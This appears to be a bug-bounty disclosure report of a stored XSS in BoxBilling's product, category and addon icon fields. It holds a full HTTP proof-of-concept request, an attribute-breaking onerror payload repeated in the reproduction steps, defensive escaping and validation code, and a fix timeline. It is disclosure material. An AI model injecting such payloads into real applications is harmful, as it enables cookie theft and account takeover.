Cross-site Scripting (XSS) - Stored in boxbilling/boxbilling

Valid

Reported on Oct 19th 2021


Description

Stored XSS in the 'icon_url' parameter when creating a New Product, New Category or New Addon.

Proof of Concept

// PoC.req
POST /BoxBilling/src/index.php?_url=/api/admin/product/update HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
CSRFP-Token: fc85929963
Content-Length: 1560
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/BoxBilling/src/bb-admin/product/manage/5
Cookie: CSRFP-Token=fc85929963; BOXSID=eb4u3o7qnkkn8ohal9mfq8aulo; PHPSESSID=1vd67cg3nhsancbdqd2us579d0
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

product_category_id=1&form_id=&status=enabled&hidden=0&setup=after_payment&icon_url=x%22+oNeRRor%3D%22alert(1)%3B&title=test&slug=test&pricing%5Btype%5D=free&pricing%5Bonce%5D%5Bsetup%5D=0.00&pricing%5Bonce%5D%5Bprice%5D=0.00&pricing%5Brecurrent%5D%5B1W%5D%5Bsetup%5D=0.00&pricing%5Brecurrent%5D%5B1W%5D%5Bprice%5D=0.00&pricing%5Brecurrent%5D%5B1W%5D%5Benabled%5D=0&pricing%5Brecurrent%5D%5B1W%5D%5Benabled%5D=1&pricing%5Brecurrent%5D%5B1M%5D%5Bsetup%5D=0.00&pricing%5Brecurrent%5D%5B1M%5D%5Bprice%5D=0.00&pricing%5Brecurrent%5D%5B1M%5D%5Benabled%5D=0&pricing%5Brecurrent%5D%5B1M%5D%5Benabled%5D=1&pricing%5Brecurrent%5D%5B3M%5D%5Bsetup%5D=0.00&pricing%5Brecurrent%5D%5B3M%5D%5Bprice%5D=0.00&pricing%5Brecurrent%5D%5B3M%5D%5Benabled%5D=0&pricing%5Brecurrent%5D%5B3M%5D%5Benabled%5D=1&pricing%5Brecurrent%5D%5B6M%5D%5Bsetup%5D=0.00&pricing%5Brecurrent%5D%5B6M%5D%5Bprice%5D=0.00&pricing%5Brecurrent%5D%5B6M%5D%5Benabled%5D=0&pricing%5Brecurrent%5D%5B6M%5D%5Benabled%5D=1&pricing%5Brecurrent%5D%5B1Y%5D%5Bsetup%5D=0.00&pricing%5Brecurrent%5D%5B1Y%5D%5Bprice%5D=0.00&pricing%5Brecurrent%5D%5B1Y%5D%5Benabled%5D=0&pricing%5Brecurrent%5D%5B1Y%5D%5Benabled%5D=1&pricing%5Brecurrent%5D%5B2Y%5D%5Bsetup%5D=0.00&pricing%5Brecurrent%5D%5B2Y%5D%5Bprice%5D=0.00&pricing%5Brecurrent%5D%5B2Y%5D%5Benabled%5D=0&pricing%5Brecurrent%5D%5B2Y%5D%5Benabled%5D=1&pricing%5Brecurrent%5D%5B3Y%5D%5Bsetup%5D=0.00&pricing%5Brecurrent%5D%5B3Y%5D%5Bprice%5D=0.00&pricing%5Brecurrent%5D%5B3Y%5D%5Benabled%5D=0&pricing%5Brecurrent%5D%5B3Y%5D%5Benabled%5D=1&description=&upgrades=&id=5&id=5

Steps to Reproduce

New Product

Go to the Products menu and choose Products/Services.

Create a new product and, in the field 'Icon/Image URL', enter the payload: x" oNeRRor="alert(1);

New Category

Go to the Products menu and choose Products/Services.

Create a new category and, in the field 'Icon', enter the payload: x" oNeRRor="alert(1);

New Addon

Go to the Products menu and choose Product addons.

Create a new addon and, in the field 'Icon', enter the payload: x" oNeRRor="alert(1);

Video PoC : PoC

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.
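As an added defensive illustration (not code from the report or from BoxBilling), the snippet below shows why the submitted value breaks out of an unescaped img src attribute, and two independent fixes: attribute-context encoding at output time, and a server-side allowlist check on icon_url before the value is stored. The function names and the PAYLOAD constant are this example's own; the payload string is the one the report submits.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# The value the report sends in icon_url (constructed here from the PoC).
PAYLOAD = 'x" oNeRRor="alert(1);'


def render_icon_vulnerable(icon_url: str) -> str:
    """Template output with no escaping: the stored value lands verbatim
    inside the src attribute, so a double quote in it ends the attribute
    early and whatever follows becomes a new attribute (here: onerror)."""
    return f'<img src="{icon_url}">'


def render_icon_safe(icon_url: str) -> str:
    """Output-side fix: attribute-context encoding, the equivalent of
    htmlspecialchars($v, ENT_QUOTES) in PHP. Double quotes become &quot;
    and can no longer terminate the attribute."""
    return f'<img src="{html.escape(icon_url, quote=True)}">'


def is_acceptable_icon_url(icon_url: str) -> bool:
    """Input-side fix for the product/category/addon update handlers:
    accept only absolute http(s) URLs or site-relative paths, and refuse
    anything containing quotes, angle brackets or whitespace."""
    if any(ch in icon_url for ch in '"\'<> \t\r\n'):
        return False
    parsed = urlparse(icon_url)
    if parsed.scheme in ("http", "https"):
        return bool(parsed.netloc)
    return parsed.scheme == "" and icon_url.startswith("/")


class _ImgAttrs(HTMLParser):
    """Collects the attributes of the <img> tag the way a browser parser
    sees them: names lower-cased, character references decoded."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.attrs = dict(attrs)


def img_attributes(markup: str) -> dict:
    """Return the <img> attributes a browser would derive from the markup."""
    parser = _ImgAttrs()
    parser.feed(markup)
    return parser.attrs
```

Parsing the two renderings side by side is the quickest regression check: the unescaped one yields an onerror attribute, the encoded one yields only src with the payload as an inert string.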

Timeline

We have contacted a member of the boxbilling team and are waiting to hear back.
lethanhphuc modified the report.
We have sent a follow up to the boxbilling team. We will try again in 7 days.
Belle Aerni validated this vulnerability.
lethanhphuc has been awarded the disclosure bounty.
lethanhphuc (Researcher): PR: https://github.com/boxbilling/boxbilling/pull/1119
Belle Aerni marked this as fixed in 4.22-beta.1.2 with commit fc03c9.
lethanhphuc has been awarded the fix bounty.
This vulnerability will not receive a CVE.